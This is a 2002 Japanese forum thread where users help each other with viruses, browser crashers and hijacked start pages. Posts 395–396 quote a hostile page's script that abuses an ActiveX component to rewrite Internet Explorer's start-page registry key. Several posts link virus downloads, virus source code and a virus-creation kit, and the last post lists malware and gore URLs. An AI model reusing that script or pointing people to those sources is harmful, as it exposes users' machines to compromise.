ttp://windows3000.virtualave.net/NewToolz.html
行くだけなら良いですが実行しないように
このアドレスを憶えておいてひっかからないようにしましょう
何か起きても責任は持ちません

376 :名無しさん@お腹いっぱい。:02/02/14 15:56
>>375
Thanx! コレクションが増えましたっ

377 :375:02/02/14 17:23
すみません。まちがえました。
ttp://windows3000.virtualave.net/NewToolz.htm
ttp://easyweb.easynet.co.uk/~hiros
ttp://sinagoga.hoops.ne.jp/html/virus_down.htm
行くだけなら良いですが実行しないように
このアドレスを憶えておいてひっかからないようにしましょう
何か起きても責任は持ちません


378 :名無しさん@お腹いっぱい。:02/02/16 23:11
あげ。

379 :名無しさん@お腹いっぱい。:02/02/17 00:22
ttp://www.top.or.jp/~godhand/a2.html
ここのサイトで強制的にファイルをダウソさせられたみたいなのですが
ウイルスとかでしょうか?



380 :名無しさん@お腹いっぱい。:02/02/17 00:34
>>379
http://www.google.com/search?hl=ja&q=%22%2Bwww.top.or.jp%2F%7Egodhand%2Fa2.html%22+%83E%83C%83%8B%83X&lr=
  

381 :名無しさん@お腹いっぱい。:02/02/17 00:35
>>377
漏れは、旬な奴探してるから要らない。。。

382 :↑これみて自分で勉強してね:02/02/17 00:36
 

383 :名無しさん@お腹いっぱい。:02/02/17 00:36
>>380
ありがとうございました。安心しました

384 :名無しさん@お腹いっぱい。:02/02/17 01:20
madokaを踏んでしまいました。
気持ち悪くてしょうがないです。
セーフモードで起動してファイルを削除したのですが
まだ、画像と「キャー」という声が出てきます。
どうしたらいいのですか?
教えてください。

385 :↑ネタじゃなければ過去ログ読んで:02/02/17 01:31
 

386 :381:02/02/17 01:33
>>382
そうか!
漏れのレスがそんなに参考になたか!!!

387 :382:02/02/17 01:57
>>386
うん!勉強になるねw …ツーカ、カブッタスマソ..

388 :名無しさん@お腹いっぱい。:02/02/19 02:08
ノートンのアンチウィルスを使っているのですが、
9x系のOSなので、リソースの問題で常駐はさせていません。
(使っている2chブラウザとも相性が悪いし)
で、ウィルスサイトと言われるところを踏んでしまったのですが、
アンチウィルスのレベルを目いっぱい上げて、全ての
ファイルをスキャンしても、何も出てこないのです。
そういう種類のトロイとか、ウィルスは存在しますか?

389 :ノートン君ハイ!:02/02/19 02:12
>>388
バージョンによって検出されるトロイと素通りのトロイがいると思われ。

390 :名無しさん@お腹いっぱい。:02/02/19 02:22
>>389
アンチウィルス2000の7.07.23Dとありますが・・・。
2001とかの方がいいのでしょうか?

391 :名無しさん@お腹いっぱい:02/02/19 06:01
>>390
そのあんたがいう"ウィルスサイト"てのは踏んだだけで感染するサイトなのか?
それともウィルスがたくさん置いてあるだけのサイトなのか?
自分で.exe実行されたかどうかも知らないの?

ついでに2002にしろ

392 :名無しさん@お腹いっぱい。:02/02/19 06:27
そのサイトのURL貼ってみるのが速いが
どーせまた godhand みたいなとこだろ。

393 :あや:02/02/19 14:46
「IEstart.gen」ってどうやって駆除したらいいんですか? McAfeeのウィルススキャンでも効き目ない見たいんです。


394 :390:02/02/19 15:09
>>391
ごめんなさい、ウィルスに関してはかなり知識が乏しいので
(今まで、トロイとウィルスとワームの違いさえ知らなかった)
踏んだだけで、感染するのかしないのかさえも知らないのです。
踏んだだけなら大丈夫なんでしょうか
ちなみに、>>392の方がおっしゃるように、下に貼りますが
ブラクラも伴っていますので、注意してください。

www.geocities.com/ccsacla/images0012.jpg

395 :  :02/02/19 19:01
www.geocities.com/ccsacla/images0012.jpg
実体はHTML

<html>

<head>
<title></title>
</head>

<body onUnload="unload()">

<iframe src="ssopn.html">
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.geocities.com/fes74592/ssopn.html");
//Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserOptions", "1");
}
catch(e)
{}
}
catch(e)
{}
}

function init()
{
setTimeout("f()", 1000);
}
init();
</script>

<img src="ok.jpg">


396 :  :02/02/19 19:02
続き

</script>
</body>
</html>
<noembed><noscript><noscript><noscript><xml>
View-Source:http://www.geocities.com/fes74592/
View-Source:http://www.geocities.com/fes74592/images0012.jpg
View-Source:http://www.geocities.com/fes74592/ssopn.html
http://www.geocities.com/fes74592/ok.jpg
View-Source:http://www.geocities.com/fest7742/
View-Source:http://www.geocities.com/fest7742/images0012.jpg
View-Source:http://www.geocities.com/fest7742/ssopn.html
http://www.geocities.com/fest7742/ok.jpg
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?
<META HTTP-EQUIV="Refresh" CONTENT=25;URL="ssopn.html">

397 :名無しさん@お腹いっぱい。:02/02/19 19:07
祭りのため串急募
http://curry.2ch.net/test/read.cgi/sfe/1014090058/l50




398 :392:02/02/19 19:21
>>394-396
あーそれ、前に見たことある。ということは既出だ。
たぶん、このスレか初心者スレ。
ブラクラとスタートページの書き換えの複合だと思う。
他にもなにかあったかも。

>どーせまた godhand
じゃ〜なかったな。すまそ。

399 :名無しさん@お腹いっぱい。:02/02/19 20:19
>>394
スタートページ書き換え +
mail ストーム +
con,prn,nul
だからスタートページ直せば良してIEのパッチあてれ。


400 :.:02/02/19 23:07
今更ニムダの事なんですが、先ほどモナ板でリンクされてたHPでJS_NIMUDA.A
ってのに引っかかりましたウイルスバスター2002入れたたんで事無きを得たんですが
セキュリティ関係のHPいくとPE_NIMUDA.Aって表記されてるんですよね。
名前が違うだけで対処はニムダと一緒でよろしいのでしょうか?

401 :390:02/02/19 23:09
ありがとうございました。
パッチもちゃんと当てました。
これで安心して、修復ポイントが作れます。(^^;

402 :名無しさん@お腹いっぱい。:02/02/19 23:14
>>400
ウィルスの名前の定義はウィルス対策ソフトのメーカーによって異なる

403 :.:02/02/19 23:33
なるほど、そう言う事でしたか。有難うございました>>400

404 :名無しさん@お腹いっぱい:02/02/19 23:47
>>396
mail128連射?・・・・
喰らったら禿げ鬱だろうな(;´Д`)


405 :404:02/02/19 23:49
↑なんか"喰らったら"ていうのも変な言い方のような・・・
そんな命令喰らわされたら?・・・か・・・・

もっと精進しよう・・・

406 : :02/02/21 12:18
 

407 :名無しさん@お腹いっぱい。:02/02/22 01:36
PCの電源を落とすようなウィルスってありますか?
起動後数分(不定)で電源が落ちるので困っています

408 :名無しさん@お腹いっぱい。:02/02/22 02:57
>>407
ウイルスよりもPCの調子がオカシイんでは?
原因になりそうなのはいっぱいありすぎて
一概には言えないが、ディスプレイドライバや
Mouse/KB の接続が不完全とか…。CPU冷却不足とか。

409 : :02/02/22 18:40
    

410 : :02/02/23 00:14
>>381
これは?
http://easyweb.easynet.co.uk/~hiros/virii99/Not/asciiv.zip
http://easyweb.easynet.co.uk/~hiros/virii99/Not/cb4111.zip
http://easyweb.easynet.co.uk/~hiros/virii99/Not/dodgy.zip
http://easyweb.easynet.co.uk/~hiros/virii99/Not/urkel.zip

411 :名無しさん@お腹いっぱい。:02/02/23 21:15
>>410
今更。要らない。


412 : :02/02/24 01:55
  

413 :こわい:02/02/24 10:14
超初心者です、申し訳ありませんが助けていただけませんでしょうか!
【ttp://www.top.or.jp/~godhand/a2.html

こんなものを踏んじゃったんですけど、これって悪い物なのでしょうか?
御存知の方教えてください。よろしくおねがいします。

414 :名無しさん@お腹いっぱい。:02/02/24 10:31
>>413 マルチしちゃいかんな。

415 :>414:02/02/24 10:52
>>413
マルチってどういう操作のことでしょうか…教えていただけませんでしょうか? どうやったら対処できますか?
よろしくお願いします…



416 :名無しさん@お腹いっぱい。:02/02/24 11:09
>>413
マルチというのはあちこちで同じことを書くことだ。
マルチは嫌われているのでつくレスもつか無くなる。
初心者を免罪符にするなよ、初心者なりに他のスレを見て回ればこのことは
判るはずだからな。
http://www.top.or.jp/~godhand/a2.html は禿げしく外出なので気にするな。
気になるならこのスレ、くだ質、初質の最初から読めば出てくるはずだ。

417 :名無しさん@お腹いっぱい。:02/02/24 11:08
>>415
同じ質問を複数のスレに書くことは、ルール違反であり嫌われます。
結局どちらも回答が得られなくなり、損するのはあなたですよ。

418 :名無しさん@お腹いっぱい。:02/02/24 13:57
他板で次のアドレスを踏んでしまいました。
zodiad.subnet.dk/image_002.jpg
中身は>>395の前半部分に似ています。
FDDがガリガリいって部落ら状態になり、再起動しましたが
ウイルスバスターのオンラインスキャンで、インターネットの
テンポラリフォルダに「JS_EXCEPTION.GEN」
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN
が見つかったので削除しました。
幸いActiveXとJavaスクリプトは切ってあったのですが、
部落らにはやられたのでちょっと心配しています。

念のために再インストールした方がいいのか、それとも
心配する必要はないのか、教えてください。


419 :名無しさん@お腹いっぱい。:02/02/24 14:02
>>418
初心者スレを全レス表示してzodiadで再検索して確認。

420 :名無しさん@お腹いっぱい。:02/02/24 14:08
最近2chの各板で貼らてるものなのだが
ttp://www.geocities.com./oohozv/image/list01.jpg
で、でんこの偽造がかかってる
\windows以下のフォルダを削除するらしい
落としてみたが、アイコンも偽造してある
当然バイナリ見ないと確認できない
これどうよ?

421 :418:02/02/24 14:29
>>419
「初心者用質問スレッド」のPart1〜7まで全レス検索してみましたが
一件も引っかかりませんでした。
googleでも検索結果0です。
誰かわかる人いましたらアドバイスください。

422 :名無しさん@お腹いっぱい。:02/02/24 14:35
このスレがいきなりあがると

また新種が発生したか
と思うのは私だけ?

423 :名無しさん@お腹いっぱい。:02/02/24 14:40
>>421
どうせ、google検索するなら
http://www.google.co.jp/search?q=JS_EXCEPTION.GEN+%83E%83B%83%8B%83X+%8F%EE%95%F1&hl=ja&lr=on&btnG=Google+%8C%9F%8D%F5

>>422
新種発生しなくても、なんかスタートページが書き換えられたとか、
これ大丈夫でしょうかとかはここんとこすごく多いから
(初級ネット板なんてもう大変)
ここが上がることもあるんじゃないかなあ。

424 :名無しさん@お腹いっぱい。:02/02/24 14:42
>>422
ああそうそう、アンチウイルスベンダーが一番詳しく、
情報が早いので、シマンテックとかトレンドマイクロで
JS_EXCEPTION.GENを探してみて。症状が書かれているので
確認の役に立つかと思う。

425 :あのう:02/02/24 14:50
Napigator最新版がトロイって話マジですか?

426 :418:02/02/24 15:20
>>423-424
レスありがとうございます。
JS_EXCEPTION.GENの情報は既に調べてあり、
報告されている現象が見られなかったのでその点では安心なのですが、
今回踏んだアドレスはブラクラも兼ねていたのでちょっと動揺してしまい、
不安になってしまいました。

>>395のソースと比べると、
  <script>
  window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
  </script>
というのが冒頭にあるんですが、この部分がブラクラだとしたら、
単純に「JS_EXCEPTION.GEN」+ブラクラと考えていいんでしょうか?
それなら問題はなさそうです。

427 : :02/02/24 16:07
すいません、ついうっかりアフォなことしてしまいました。
いやぁね、メール(個人アドレス)に添付ファイルなしのアドレス付きメールが
あったんで、久々に気合い入れて押したらみごとにひっかかっちゃいまして。

http://Best-Greeting.com/view.html?EFC9EWBKFJYAR
ってとこなんですが。アドレスはすでに「暴力行為がありました」とかでデリられてます。

症状は、特定のサイトを開くたびに、windows personalなんたらとかいうインストーラ立ち上がって
毎回立ち上がってウザイのでOKしたら、こんどはブラウザ立ち上げるとRAS errorなるダイアログが出て
同時に実行に失敗したとポップアップが出ます。
その後、デスクトップ、メールフォルダ、WINNTフォルダ、スタートアップフォルダに
5-1-25-389.exe
ちゃんが産み落とされます。アイコンは素敵な画像です。
ダイヤルアップじゃなくて良かったーと言う感じですが、駆除方法が思いつかないので
どうしていいものやら。

お知恵をお貸し下さいまし。

428 :名無しさん@お腹いっぱい。:02/02/24 16:22
>>426
なんかそのアドレスのところのソースを見られない。
それにJAVAスク切っていたのに、ブラクラにかかったてなあたりが
ちょっとひっかかることはひっかかるけど、
IEスタートページが大丈夫なら、もう書き換えはないんじゃないかなあ。
まあ、用心してってことで。

429 :名無しさん@お腹いっぱい。:02/02/24 16:24
>>427
とにかくウイルススキャン。
トレンドマイクロかシマンテックへ。
とりあえずなら、下記のサイトからオンラインスキャン。

http://www.trendmicro.co.jp/
http://www.symantec.co.jp/


430 :名無しさん@お腹いっぱい。:02/02/24 16:28
>>427
いまから最新定義(2/23付)おとしてノートンかけてみます。

431 : :02/02/24 16:29
430です。
>>427 は、 >>429さんへのまちがい。スマソ

432 :ノートンでは反応しないウイルス?:02/02/25 03:09
remove@mail.vertcoms.com
ノートンでは反応しないウイルス?
http://www.ebcvg.com/binary2.php
Mac.Scores
http://www.ebcvg.com/sections/binary/Mac.Scores.zip
Mac.T4d
http://www.ebcvg.com/sections/binary/Mac.T4d.zip
Win32.Mix
http://www.ebcvg.com/sections/binary/Win32.Mix.zip
以上の3つはノートンは反応しません。
−−−
http://www.ebcvg.com/viruses.php
Virus Source Codes
Polymorphic Engines
がある。
http://www.ebcvg.com/sections/polymorphic/W97M.txt
はBloodhound.HybridCOM
知識があればウイルスが作成できる。
ウイルス作成ソフトもある。
http://www.ebcvg.com/binary.php

433 :ウイルス直し方教えて:02/02/25 13:50
僕のはなんか変でIEのツールバーの検索を使うと
jethomepageっていう英語の検索サイトにつながっちゃうんですよね。
いろいろ調べたんですけど、jethomepageのウイルスはメインページの
スタートページを変えちゃうっていうのなんですよね。
なんか自分の症状と違うんですよね。
誰か僕のやつの治し方わかる方いませんかね?

434 :名無しさん@お腹いっぱい。:02/02/25 14:09
先生!ぼくも>>433とおなじようですが
IEのホームをblankにしているのですが、
そのタイトルが「http://geocities.com/braindiary
とでています。
直し方を教えてください!

435 :マジレスお願いします:02/02/25 14:22
SHODOCLC.DLL

これっていったいなんですか?

436 :けんずぃ:02/02/25 16:37
ちょっとすみません。普段はゲーム板に生息してる者ですが、先日ウイルスバスターが妙な物を捕まえました。
が、削除してくれません。自分で削除しようとしても「現在WINDOWSが使用しています」と言われ、削除できません。
どなたか教えて下さい。これは何ですか?

パソコンに電源を入れると毎回出るエラーメッセージです。

ウイルスが検出されました(TSC.LOGを確認して下さい):
TROJ_BACKDOORM1
TROJ_YKRT.ASVR c:windows\rundV.exe 処理失敗

437 :名無しさん@お腹いっぱい。:02/02/25 16:48
DOSデ サクジョ デキナイノカ?

438 :たすけてください!!:02/02/25 16:49
これを踏んでしまいました
どうしたらいいのかわかりません
本当に助けてください
よろしくお願いします

ttp://ime.nu/ime.nu/ime.nu/www.bd.wakwak.com/~shino/data/download.html

439 :名無しさん@お腹いっぱい。:02/02/25 16:52
>436
これかな?
http://www.trendmicro.co.jp/virusinfo/vbc_default3.asp?VName=TROJ%5FBACKDOOR%2EM1

440 :けんずぃ:02/02/25 16:56
>439
ありがとうございます。助かります。


441 : :02/02/25 16:57
>>438
又IEの新たな穴ハッケソ?


442 : :02/02/25 17:00
>>438
とりあえずウイルススキャンしなさい
http://www.trendmicro.co.jp/hcall/scan.htm

443 :たすけてください!!:02/02/25 17:05
>>441>>442
ただ今ウィルススキャンしています。
しかし少し古いバージョンなので引っ掛からないかも知れません。
そうゆう場合どうしたらいいでしょうか?
ちなみに何故か新しいのにする事もできません。

444 :名無しさん@お腹いっぱい。:02/02/25 17:29
>>443
ttp://www.bd.wakwak.com/~shino/data/end.gif
ようするにコレが正体。GIF動画だね。

445 :たすけてください!!:02/02/25 17:31
>>444
ありがとうございます。
何も問題は無いんですね?

446 :名無しさん@お腹いっぱい。:02/02/25 17:33
こんなGIFを作るのって、よっぽど暇なんだろね。
こっちがデフォルトデザインと違ってたら、
違和感あってすぐバレルけどね。

447 :名無しさん@お腹いっぱい。:02/02/25 17:34
>>445
何も心配ないよ。

448 : :02/02/25 17:49
違うところにも書いてしまったけど、どうしても情報が欲しいので書かさせていただきます
ttp://homepage3.nifty.com/girls_and_boys~/
ここふんじゃったらクライジーゴーストの口から血をだしてる女の画像が出てきたのですが、ここによるパソコンへの悪影響はあるんですか?
困っています、申し訳ありませんが教えてください。
最後に、マルチですいません。

449 :名無しさん@お腹いっぱい。:02/02/25 18:12
>>448
元のcrazygostと同じ、後は自分で情報さがしてね。

450 :W32/Klez」ウイルスの亜種:02/02/26 17:08
「W32/Klez」ウイルスの亜種に関する情報(2002/02/26)
http://www.ipa.go.jp/security/topics/newvirus/klez.html


451 :名無しさん@お腹いっぱい。:02/02/26 18:09
ウィルスって貼ると逮捕されるの?

452 :名無しさん@お腹いっぱい。:02/02/26 19:29
この二つは安全でしょうか?

ttp://homepage2.nifty.com/madhatter/katayoku.swf
ttp://nara.cool.ne.jp/mituto

453 :名無しさん@お腹いっぱい。:02/02/26 19:37
>>452
上はちょっと前に流行った田代のフラッシュだよ。見る価値あり。
下はなんかよく分からない科学の話題のサイト。
 ↓こんなやつ
洸人LIBRARY
The Mituto Library
田中 洸人 作

454 :452:02/02/26 19:39
>>453
ありがとうございます

455 :名無しさん@お腹いっぱい。:02/02/26 23:53
この板の「このウィルス何?」スレに入ろうとしたら
ウィルスが検出されました、というウィンドウが出たので慌てて閉じました。
もしかしてあのスレはウィルスに汚染されているのですか?
ほっといたら大勢感染してしまうのでしょうか?
もしかして凄く危ないのでは?
(PCにうといのでたいした事じゃなかったらすみません)

456 :名無しさん@お腹いっぱい。:02/02/27 00:26
>>455
ノートンさんですか?(笑)
そんなスレがあったら…それはそれで面白いかもね〜


457 :455:02/02/27 00:45
あ、たいした事じゃないみたいですね、
これがノートンなのかどうかも分からないけど
McAfee VSieldというのが警告してくるもので驚いてしまって。
お返事ありがとうございました。

458 :名無しさん@お腹いっぱい。:02/02/27 00:47
>>455-457
なんか微笑ましい。

459 :名無しさん@お腹いっぱい。:02/02/27 00:52
>>457
そうだと思った

460 :455:02/02/27 01:02
今マカフィーについてのスレ読んでます。
色々問題ありなソフトみたいですね(^^;)
これから勉強します。どうもありがとう。

461 : :02/02/27 14:53
  

462 :433:02/02/27 15:28
>>433のお答え待ってます。

463 :名無しさん@お腹いっぱい。:02/02/27 17:15
>>462
<center><a
onClick="this.style.behavior='url(#default#homepage)'; this.setHomePage('http://www.jethomepage.com');"
href="http://www.jethomepage.com/"><font face="Arial, Helvetica, sans-serif" size="2" >Make
JetHomePage Your Homepage</font><font face=Verdana
size=2>
</font></a>
これクリックしただけちゃうんか


464 :anonymous:02/02/27 17:34
>>462
なんとなく助言(励まし)
とは言ってもOSもIEのヴァージョンも何も書いてないので大雑把に…

レジストリの復元をためしてみる(多分というかもう無理だろうけど)
DOSで起動→"scanreg /restore"
もしくは(Meの場合)ファイル名指定して実行→"scanreg /restore"

IEの修復も試してみる
コンパネ→アプリの追加削除→IE選択
もしくはファイル名してして実行→"rundll32 setupwbv.dll,IE6Maintenance"
(IE5かIE5.5なら"rundll32 setupwbv.dll,IE5Maintenance")

↑でもダメだったらファイル名指定して実行→"regedit"で自分でレジストリエディタ動かして細かく調べるべし。

#当然だけど二重引用符は入力するべき文字列に含まない


…ていうかウィルス命判明したんなら(おそらく"js.seeker.b")スマンテックとかにも具体的な復旧方法のってるでしょ。
駆除したら復旧は自分でやる!!!お前のマシンはお前しか知らん!(・∀・)

とりあえず参考
http://www.symantec.com/region/jp/sarcj/data/j/js.seeker.b.html
(外れてても文句ナシでおながい(_ _(--;(_ _(--; ペコペコ)

465 :たすけて〜:02/02/27 20:11
さっきから一分おきくらいに誰かはいってこようとしてブロックしましたって
でるんですけどどうしたらいいの?退治できないですか?おしえて〜

466 :名無しさん@お腹いっぱい。:02/02/27 20:13
>465
日本語を話してください。つーかウイルスじゃないじゃん。

467 :非決定性名無しさん:02/02/27 20:31
>>465 (´-`).。oO(該当するportを閉めておけばよかろう?)

468 :c:02/02/27 20:39
>>465
ポートスキャンでもされてんでしょ。
不要なサービス止めとけ。

それより迷惑だからマルチやめれ。

469 :名無しさん@お腹いっぱい。:02/02/27 23:09
誰か、胎児並みの>>465を退治できないですか?おしえて〜(w


470 :名無しさん@お腹いっぱい。:02/02/27 23:14
>>469
ブロックしてるんだからいいんじゃない

471 :名無しさん@お腹いっぱい。:02/02/28 01:06
今日は何だかウィルスメールらしきものがガンガン送られて来てますよ〜。。
同じとこから、193バイトのメールがもう10回くらい来とります。
皆さんはいかがですか??

472 :hagebouzu:02/02/28 01:41
EMAILCHK2@NIHON-DATA.CO.JP
EMAILCHK2@NIHON-DATA.CO.JP
EMAILCHK2@NIHON-DATA.CO.JP
EMAILCHK2@NIHON-DATA.CO.JP
EMAILCHK2@NIHON-DATA.CO.JP
uirusu chuui

473 : :02/02/28 12:33
すいません、お聞きします。
きのう、添付メールでYOU_ARE_FAT!.MP3.scrがきたのですが、
IE5.5SP2なら問題ないでしょうか?。
プレビューで開いてしまったのですが、「保存」か「開く」のダイアログが出てキャンセルして削除しました。


474 :名無しさん@お腹いっぱい。:02/02/28 13:22
>>473
ウィルス対策ソフトは入れてないのか?


475 :473:02/02/28 15:44
>>474
入れていませんでした。
一応、kernel.exeとkdll.dllがないのを確認して、
オンラインスキャンもやりましたが引っかかりませんでした。
これで大丈夫なのでしょうか??。


476 :名無しさん@お腹いっぱい。:02/02/28 16:01
>>247
「保存」か「開く」のダイアログが出てくるなら大丈夫かと。
この程度のこと聞きに来るレベルならちゃんとウィルス対策ソフト入れれ。

477 :473:02/02/28 16:15
>>476
ありがと。安心しました。

478 :ノートンでは反応しないウイルス?:02/02/28 17:12
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml

ノートンでは反応しないウイルス?
http://www.ebcvg.com/binary2.php
Mac.Scores                      (ノートンの検出名)
http://www.ebcvg.com/sections/binary/Mac.Scores.zip
Mac.T4d
http://www.ebcvg.com/sections/binary/Mac.T4d.zip
Win32.Mix
http://www.ebcvg.com/sections/binary/Win32.Mix.zip (W32.Fully.3424)
Win2k.TaiChi
http://www.ebcvg.com/sections/binary/Win2k.TaiChi.zip (W2K.Lamchi)
Win32.Sharp
http://www.ebcvg.com/sections/binary/Win32.Sharp.zip (W32.HLLP.Sharpei@mm)
I-Worm.Grifin
http://www.ebcvg.com/sections/binary/I-Worm.Grifin.zip (W32.Grifout.Worm)
以上の2つはノートンは反応しません。
−−−−−−
http://www.ebcvg.com/viruses.php
Virus Source Codes
Polymorphic Engines
がある。
http://www.ebcvg.com/sections/polymorphic/W97M.txt
はBloodhound.HybridCOM
知識があればウイルスが作成できる。
ウイルス作成ソフトもある。
http://www.ebcvg.com/binary.php

479 :471:02/02/28 17:59
今日もウィルスらしきメール(添付ファイル付きで、タイトル文字化け)が
この時間までに28件も送られてきました。。
オイラ、誰かに恨まれてるのかなぁ。。(涙目)

480 :>>479:02/02/28 18:47
>>479
http://www.jcsa.or.jp/
http://www.jcsa.or.jp/NoMoreHybr.html
メールが >>479 アドレスに来ている場合、次の原因が考えられる。

A.メールアドレスをWebページ上で公開している。
B.感染パソコンのユーザーとメールのやりとりがあった。
C.掲示板にメールアドレスを書き込んだ。
実際には、Aのパターンが圧倒的に多い。メールの送受信にかかる時間と
Webを閲覧する時間を比べれば、後者の方が何倍も多いからだ。
また、掲示板よりWebページ閲覧をする人数の方が多い。
Webページに対策を施すことによりAのパターンのHybrisメールを減らす、
またはなくすことができる。
なお、Cのパターンはとりあえずメールアドレスを書かない、
またはフリーメールアドレスを利用するという方法しかないだろう。

remove@mail.vertcoms.com

481 :名無しさん@お腹いっぱい。:02/02/28 21:09
なんか今日、パソコン開いたら画面がゆれていて止まりません。これはウィルスなのでしょうか?なおらないのでしょうか?知っている方いたら教えてください。

482 :cheshire-cat:02/02/28 21:16
>>481
他のディスプレイ使っても?

483 :名無しさん@お腹いっぱい。:02/02/28 21:28
>>481
それだけじゃウィルスかどうかわからん。

484 :名無しさん@お腹いっぱい。:02/02/28 21:43
圧縮ファイルをスキャンする際にDoS攻撃を仕掛けることが出来る可能性が発見された。
http://www.securiteam.com/securitynews/5PP0P1P6AM.html

なんだってさ。

古い手だけど、結構やられると嫌だよね。
ところで、防ぎようあるのかな??


485 :名無しさん@お腹いっぱい。:02/02/28 21:45
>>481
ディスプレイのコードが抜けかけてる → しっかり差し込む
近所で工事中 → 終わるまで待つ
貧乏ゆすり → 直す

486 :名無しさん@お腹いっぱい。:02/02/28 21:53
そばに別のディスプレイとか防磁の弱いスピーカとか置いてない? >>481

487 :名無しさん@お腹いっぱい。:02/02/28 22:11
>>484
例えばzipは圧縮率がセントラルディレクトリに書かれているから、異常な奴は見分けられる。

488 :481:02/02/28 22:12
>>482・483・485・486
大変ご迷惑おかけしました。コンセントディスプレイから離したら直りました。
アドバイスありがとうございました。

489 :名無しさん@お腹いっぱい。:02/02/28 23:47
今日怪しいメールが来ました。タイトルが「Re: error message」という
メールで、本文はHTML形式のようで、延々とJavaScriptで何やら記述されて
います。意味のありそうな、というか文章は入っていませんでした。
自分はMacなんで消しちゃえば関係ないのですが、念の為どのようなウイルス
か知っておきたいのです。
どなたかお判りになりますでしょうか?

490 :826:02/03/01 00:37
結局ウイルスから身を守るために一番有効なのはなんですか?
ネットするナトカなしで。

491 :名無しさん@お腹いっぱい。:02/03/01 00:47
自分のスキルを上げる


492 :名無しさん@お腹いっぱい。:02/03/01 00:49
>>490
毎日クリーンインストール

493 :名無しさん@お腹いっぱい。:02/03/01 01:11
>>490
外から帰ってきたら必ずうがいすること

494 : :02/03/01 19:27
 

495 :名無しさん@お腹いっぱい。:02/03/01 19:45
乾布摩擦って効くのかな

496 :cheshire-cat:02/03/01 20:03
>>495
肌が硬くならないのかな。
柔肌好きだから、彼女にはしてもらいたくない。
でも見たら多分萌える。

497 :名無しさん@お腹いっぱい。:02/03/01 21:53
初心者スレから誘導されてきました。

UDをやってるのでつなぎっぱなしにしてますが、
自分が不在のときにBADTRANS.Bが検出されてました。
しかも発見されたファイルはc:\RECYCLED\DC32.TMPにあって
ゴミ箱を開いても発見されませんでした。とりあえず
ゴミ箱は空にして再度チェックしたらなくなったようですが
これで問題ないでしょうか?

ちなみにウィルスバスターで隔離されてるかもしれないです。
今トレンドマイクロの方にも試しに解析メール出してます。


498 :名無しさん@お腹いっぱい。:02/03/01 22:02
>>497
自分のマシンを犠牲にしてまでUDすることないんじゃない?


499 :名無しさん@お腹いっぱい。:02/03/01 22:14
>>497
当然、隠しファイルも表示する設定になってるんだよね?
それでもないなら平気なのかなあ…

500 :名無しさん@お腹いっぱい。:02/03/01 22:26
>>497
隔離したからなくなっただけじゃないの?
とりあえず、隔離したのなら問題ないでしょ

501 :497:02/03/01 22:27
表示する設定にはもちろんなってますが、今見ても
ファイルがひとつあるようです。

502 :3:02/03/02 13:36
http://slashdot.jp/article.pl?sid=02/03/02/0236229&mode=thread

503 :3:02/03/02 14:25
IEとOEに任意コマンド起動の欠陥

504 :名無しさん@お腹いっぱい。:02/03/02 18:31
>>502 の問題、例のIEの欠陥でウイルスに利用される可能性…とは、
ウイルスコードを送りこんでおいて、Htmlでコードを実行させる
ってパターンかな??フルPATHの取得が難しそうだが…どうなんだろう?

それとも、既存のプログラムの機能をウイルスで利用するってことかな?

505 :別スレより:02/03/02 21:45
ウイルスブラクラ集初心者は注意されたし
Brocralist.txt

yahoo5briefcase.vr9.com/preteen/__tn___________kidsux.jpgeasyweb.easynet.co.uk/~hiros/virii00/METALLICA_SONG.MP3 ウィルス
easyweb.easynet.co.uk/~hiros/virii00/METALLICA_SONG.MP3 ウィルス
bbs.666host.com/ ウィルス
easyweb.easynet.co.uk/~hiros/ ウィルス
www.geocities.com/ccsacla/images0012.jpg ウィルス
zodiad.subnet.dk/image_002.jpg ウィルス
go5.163.com/sg9741/ ウィルス
www.ddanzi.com/ddanziilbo/bbs/cwb-data/data/FtvBBS/vavy.jpg グロ
vatican.rotten.com/infantiphagia/taboo2.html グロ
vagina.rotten.com/motorcycle/motorcycle.jpg グロ
village.infoweb.ne.jp/~angie/image/mist/movie/kill.mpeg グロ
www.trauma.softcoma.com/pictures/headless/15-kepa3.jpg グロ
www.stileproject.com/monkey_sugar.swf グロ
movies.ogrish.com/elevator.zip グロ
f1italia.monrif.net/08video/altrivideo/video1977.php3 グロ
www.trauma.softcoma.com/pictures/anenceph/index.htm グロ
ime.nu/www.eternal.rest.org.uk/58cy/flesh/3rd-ci53/b268-119.jpg グロ
myhome.hananet.net/~crazyghost/goto.htm 恐怖
voo.to/morninggazou 恐怖
www.popkmart.ne.jp/dl/tousatu.html 恐怖
homepage3.nifty.com/girls_and_boys~/ 恐怖
www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/files/madoka08.zip 恐怖
www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/files/hikaru04.zip 恐怖
www.geocities.co.jp/SiliconValley-Bay/4700/image01.gif 恐怖
www.mobilestation.tv/~feel/img/image01.gif 恐怖
r2.ugfree.to/~Sweet01/syasin.htm 恐怖
www.trebus.fsnet.co.uk/vir2/world/che-19aj/uiho.htm 虐殺
iran-e-azad.org/stoning/stoning-19.rm 虐殺
iran-e-azad.org/stoning/stoning-28.rm 虐殺
iran-e-azad.org/stoning/stoning-56m.rm 虐殺
iran-e-azad.org/stoning/stoning-56i.rm 虐殺
iran-e-azad.org/stoning/stoning-t1.rm 虐殺
cgi.members.interq.or.jp/hokkaido/asato/upload/jam3ddr/OB000153.jpg ブラクラ
www.adapo.net/upload/source/up0095.jpg ブラクラ
homepage2.nifty.com/superpage/opai.htm ブラクラ
isweb16.infoseek.co.jp/photo/tokioufo/hiroba.html ブラクラ
www.raus.de/crashme ブラクラ
